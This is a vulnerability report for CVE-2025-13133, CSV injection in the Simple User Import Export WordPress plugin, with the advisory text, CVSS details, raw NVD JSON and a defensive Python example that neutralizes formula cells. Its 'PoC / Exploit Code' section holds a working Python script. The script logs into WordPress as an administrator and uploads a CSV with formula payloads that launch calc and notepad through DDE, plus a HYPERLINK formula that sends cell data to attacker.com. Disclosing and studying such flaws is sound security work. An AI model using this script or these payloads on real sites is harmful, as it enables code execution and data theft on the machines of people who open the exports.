Security Vulnerability Report

CVE-2025-13133

Published: 2025-11-18 10:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Simple User Import Export plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.1.7 via the 'Import/export users' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.
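The export-side fix for this class of bug is to neutralize every cell before it is written, and the same check lets an importer flag formula-looking usernames before they ever reach the database. The Python below is an added example, not code from the plugin or from this report; the field names, the sample users and the helper names are constructed.

```python
import csv
import io

# Leading characters that Excel, LibreOffice and Google Sheets treat as the
# start of a formula, or that can break out of a cell.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

def is_formula_like(value) -> bool:
    """True if a spreadsheet would evaluate this cell rather than display it."""
    return str(value).lstrip().startswith(FORMULA_PREFIXES)

def neutralize_cell(value) -> str:
    """OWASP CSV-injection guidance: prefix formula-looking values with a
    single quote so they render as text. The writer below adds the
    surrounding double quotes and doubles any embedded quotes."""
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text

def export_users_csv(users, fieldnames=("Username", "Email", "Role")) -> str:
    """Write user records to CSV text with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=list(fieldnames),
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for user in users:
        writer.writerow({k: neutralize_cell(user.get(k, "")) for k in fieldnames})
    return buf.getvalue()

def find_formula_cells(csv_text: str):
    """Scan CSV text (an upload about to be imported, or an existing export)
    and return (row, column, value) for every cell that would run as a formula."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        for c, cell in enumerate(row, start=1):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits

# Constructed sample: one ordinary user and one whose username was chosen so
# that a naive export would emit a live formula.
SAMPLE_USERS = [
    {"Username": "alice", "Email": "alice@example.invalid", "Role": "subscriber"},
    {"Username": "=1+1", "Email": "bob@example.invalid", "Role": "administrator"},
]

if __name__ == "__main__":
    safe = export_users_csv(SAMPLE_USERS)
    print(safe)
    print("formula cells left in export:", find_formula_cells(safe))  # []
```

Running `find_formula_cells` over an uploaded file before import gives the administrator a list of the exact cells to review, while `export_users_csv` guarantees that whatever was stored is emitted as text.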

CVSS Details

CVSS Score: 6.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L
Weakness: CWE-1236 (Improper Neutralization of Formula Elements in a CSV File)

Configurations (Affected Products)

No configuration data available.

Simple User Import Export (a3 User Importer) <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-13133 PoC - Simple User Import Export CSV Injection
This PoC demonstrates how to inject malicious formulas into CSV export
"""
import requests

# Configuration
TARGET_URL = "http://vulnerable-wordpress-site.com"
USERNAME = "admin"
PASSWORD = "admin_password"

# Malicious CSV injection payloads
PAYLOADS = [
    '=CMD|\'/C calc\'!A0',  # Windows calc execution
    '=HYPERLINK("http://attacker.com/steal?data="&A1)',  # Data exfiltration
    '+HYPERLINK(,"cmd\'/c calc\'!A0)',  # Alternative calc
    '-2+3+CMD|\'/C notepad\'!A0',  # Notepad execution
]


def exploit():
    """
    Step 1: Authenticate as admin user
    Step 2: Import users with malicious CSV formula in username field
    Step 3: Export users to trigger payload execution
    """
    session = requests.Session()

    # Login
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/'
    }
    resp = session.post(login_url, data=login_data)
    if 'error' in resp.text.lower():
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Access plugin import page
    import_url = f"{TARGET_URL}/wp-admin/admin.php?page=a3-user-importer"
    resp = session.get(import_url)

    # Prepare malicious CSV data with formula injection
    malicious_csv = "Username,Email,Role\n"
    for payload in PAYLOADS:
        malicious_csv += f"{payload},[email protected],administrator\n"

    # Upload malicious CSV
    files = {'upload_file': ('users.csv', malicious_csv, 'text/csv')}
    data = {'action': 'a3_import_users'}
    resp = session.post(import_url, files=files, data=data)
    if resp.status_code == 200:
        print("[+] Malicious CSV uploaded successfully")
        print("[*] When admin exports users, the CSV will contain malicious formulas")
        print("[*] Opening the exported CSV in Excel will trigger code execution")
        return True
    return False


if __name__ == "__main__":
    exploit()
```

References

https://it.wordpress.org/plugins/a3-user-importer/
https://www.wordfence.com/threat-intel/vulnerabilities/id/39ec49b4-f0f3-4ec7-b11b-ce808c025577?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13133",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T10:15:49.420",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Simple User Import Export plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.1.7 via the 'Import/export users' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L",
            "baseScore": 6.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1236"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://it.wordpress.org/plugins/a3-user-importer/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/39ec49b4-f0f3-4ec7-b11b-ce808c025577?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```